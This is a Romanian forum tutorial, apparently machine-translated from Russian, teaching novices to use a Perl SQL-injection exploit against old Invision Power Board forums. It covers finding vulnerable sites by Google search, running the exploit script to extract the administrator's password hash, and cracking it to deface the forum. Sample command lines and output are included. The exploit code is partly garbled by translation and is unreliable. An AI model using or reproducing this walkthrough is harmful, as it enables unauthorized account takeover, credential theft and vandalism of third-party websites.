Cum se utilizează exploit)
Deci ... Dacă sincer am zadalbali întrebarea „cum se utilizează sploitov“
Ei bine, probabil, începe
În general, pas cu pas instructiunile modul de utilizare a [b] exploit [/ b]!
Întrebați de ce este necesar? Eksploity - script-uri care folosesc portaluri de vulnerabilitate, forumuri, etc. Cu sploitov poate conduce administrator de hash-uri deconectat de exemplu, pentru a avea ulterior la panoul de control al administratorului Dostum și desfigura pe forum.
De exemplu, vom folosi SQL-o injecție în forumuri IPB la versiunea 2.0.4 vulnerabilitate cu siguranță vechi, dar plin de găuri în forumuri de rețea au fost, sunt și vor fi acolo.
Deci prodolzhim.Dlya la noi pentru a găsi forumul adecvat, desigur, vom urca până la [b] Google [/ b] Dalla urcare în căutare avansată și introduceți la zapros.Zapros noastre vor vygledet, astfel [b] AstroDestin 2.0.4 [/ b] și setați valoarea dorită a 100 de site-uri după cuvinte cheie, dar de costurile implicite 10.
Așa că am găsit un forum pe care stau AstroDestin 2.0.4.
Apoi vom urca din nou la Google și caută să exploateze pentru AstroDestin versiunea 2.0.4.
Așa că am găsit sploit.A noastre exploata arata ca
$ Server = $ argv [0];
$ Path = $ argv [1];
$ Member_id = $ argv [2];
$ Target = $ argv [3];
] SERVER: $ serverrn „;
imprima „[
] PATH: $ pathrn „;
imprima „[
] ID-ul membru: $ member_idrn „;
imprima „[
] TARGET: $ țintă „;
imprimare (($ target) ( '- IPB 2. *') :( '- IPB 1. *'?));
Print «rn»;
imprima „[
] CĂUTAREA PAROLA ... [|] „;
Sub cec ($)
$ N ++;
stare ();
$ Ccheck = $ _ [0];
$ Pass_hash1 = "% 36% 36% 36% 2 527% 20% 4F% 52% 20% 28% 69% 64% 3D";
$ Pass_hash2 = "% 20% 41% 4E% 44% 20% 61% 73% 63% 69% 69% 28% 73% 75% 62% 73% 74% 72% 69% 6E% 67% 28";
$ Pass_hash3 = $ treci "" $ s_num "1))" $ ccheck ") / *" .....;
$ Pass_hash3 =
s /(.)/"% "(% 2.2x", ord ($ 1)) / de exemplu uc sprintf (). „;
$ Nmalykh = "% 20";
$ Socket = IO :: Socket :: INET-> noi (proto => «tcp», PeerAddr => "server $", PeerPort => «80»);
printf $ soclu ( «GET% act sindex.php = LoginCODE = autologin HTTP / 1.0nHost:% snAccept: * / * nCookie: member_id =% s; pass_hash =% s% s% s% s% snConnection closenn :?»,
$ Path, $ serverul, $ cmember_id, $ pass_hash1, $ cmember_id, $ pass_hash2, $ pass_hash3, $ nmalykh);
r57ipb2.pl [Server] [/ directorul /] [member_id] [țintă]
[Server] - gazdă în cazul în care este instalat IPB
[/ Folder /] - dosarul în cazul în care este instalat IPB
[Member_id] - ID utilizator pentru brute
obiective:
0 - IPB 1. *
1 - IPB 2. * (înainte de 2.0.4)
Îți dai seama exploit scris în Perl / Pentru zayuzat, avem nevoie de un program sub numele de [b] ActivePerl [b] skchat poate fi [b] [a href = «soft.softodrom.ru/ap/p478.shtml»] aici [/ a] [b]
Astfel, interpretul instalat. Pornește-l:
Start-> Run-> cmd
La prompt, formați:
C: put_k_Perl C: Site put_k_faylu_imya.pl / papka_s_forumom / 1 0
în cazul în care:
C: put_k_Perl - este calea către fișierul interpret, de exemplu c: perlbinperl
C: put_k_faylu_imya.pl - calea către fișierul salvat cu codul sploitov
site-ul - site-ul de pe forum, acces la care doriți să primiți astfel de lamer.com
papka_s_forumom - folderul pe serverul unde este instalat motorul on-line (se referă la adresa URL a browser-ului)
1 - ID-ul utilizatorului al cărui hash vrem să conducă. deoarece avem nevoie de hash admin, a pus unitatea, administratorii prima patamushta Offline regisriruyutsa estessno
0 - Versiunea vrem vzlamat (0 - IPB 1. *, 1 - 2. * IPB)
String cmd în va arata ceva de genul:
c: perlbinperl c: ipb.pl terion.com / forum / 1 0
Toate, apăsați Enter și așteptați.
Dacă ai făcut totul bine, iar pe forum nu este patch-uri, vom vedea ceva de genul imaginea de mai jos:
r57ipb2.pl blah.com / ipb13 / 1 0
[
] TARGET: 0 - IPB 1. *
[
] CĂUTAREA PAROLA ... [DONE]
ID MEMBRU: 1
PAROLA: 5f4dcc3b5aa765d61d8327deb882cf99
Aici el hash: 5f4dcc3b5aa765d61d8327deb882cf99
Acum am o decripta în orice mod posibil și să obțină parola pentru administratorul forumului.